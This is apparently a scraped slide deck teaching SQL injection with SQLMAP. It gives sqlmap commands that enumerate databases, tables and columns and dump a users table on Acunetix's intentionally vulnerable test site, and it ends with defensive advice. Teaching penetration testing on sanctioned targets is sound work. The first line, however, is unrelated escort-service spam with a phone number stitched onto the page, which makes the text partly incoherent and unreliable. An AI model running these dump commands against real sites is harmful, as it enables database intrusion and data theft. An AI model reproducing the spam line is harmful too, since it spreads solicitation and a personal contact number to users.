Model Call Girl in Narela Delhi reach out to us at 🔝8264348440🔝
Web application penetration using SQLMAP.
1. W e b a p p l i c a t i o n
p e n e t r a t i o n u s i n g
S Q L M A P .
2. Points to
covered
• What is SQL injection?
• What is SQLMAP?
• HOW do SQL injection attack
work?
• Steps
• Ways to protect websites from
SQL injection
3. What is SQL Injection?
It is a type of an code injection technique that makes it possible to execute malicious SQL
queries. That can control a database server behind a web application. Attackers can gain
access of information stored in databases. They can also use SQL Injection to add, modify, and
delete records in the database.
4. What is SQLMAP?
• SQLMAP is a tool that ships in with KALI Linux and
makes the task of SQL Injection easier for a
penetration tester.
• SQLMAP is Open Source .
• SQL MAP comes with a powerful engine that
enables it to fingerprint the Database server , fetch
the data from the database server , access the
underlying file system and execute commands on
the Server operating system .
• Feature support of SQLMAP include : Full support
for MySQL, Oracle, PostgreSQL, Microsoft SQL
Server, Microsoft Access, IBM DB2, SQLite, Firebird,
Sybase and SAP MaxDB database management
systems.
• These are practically all the DBMS . Most common
5. • Penetration Testing Using SQL MAP
• For this ISE we will be using
http://testphp.vulnweb.com/ as our test web
application for penetration testing with SQLMAP .
You can visit the website and it is a vulnerable test
application by Accunetix .
6. How do SQL injection attacks work?
• Find a web application that is vulnerable to SQL injection
(SQLi) attacks. Vulnerability has two criteria. Firstly, it has
to allow execution of queries from the url, and secondly, it
should show an error for some kind of query or the other.
An error is an indication of a SQL vulnerability.
• After we know that a site is vulnerable, we need to
execute a few queries/sql commands to know what all
makes it act in an unexpected manner. Then we should
obtain information about SQL version and the number of
tables in database and columns in the tables.
• Finally we have to extract the fruitful information from the
tables.
7. STEPS to be followed
• Open terminal in Kali Linux and type sqlmap for taking help type sqlmap -h
• Listing the information about the existing databases:
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
• Listing the information about Tables present in a particular Database:
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart — tables
• Listing information about the columns of a particular table:
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users – columns
• Dump the data from the columns:
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --
dump
8. How to protect a web site or application from SQL
Injection attacks:
Developers can prevent SQL Injection vulnerabilities
in web applications by utilizing parameterized
database queries with bound , typed parameters and
careful use of parameterized stored procedures in the
database.This can be accomplished in a variety of
programming languages including java, .NET, PHP
and more.
Additionally, developers, system administrators and
database administrators can take further steps to
minimize attacks or the impact of successful attacks.
9. How to protect a web site or application from
SQL Injection attacks:
• Keep all web application software
components including libraries, plugins,
frameworks, web server software and
database server software up to date with the
latest security patches available from
vendors.
• Never allow your web application with
administrator privileges.
• Do not use shared database accounts
between different web sites or applications.
• Validate use-supplied input for expected data
types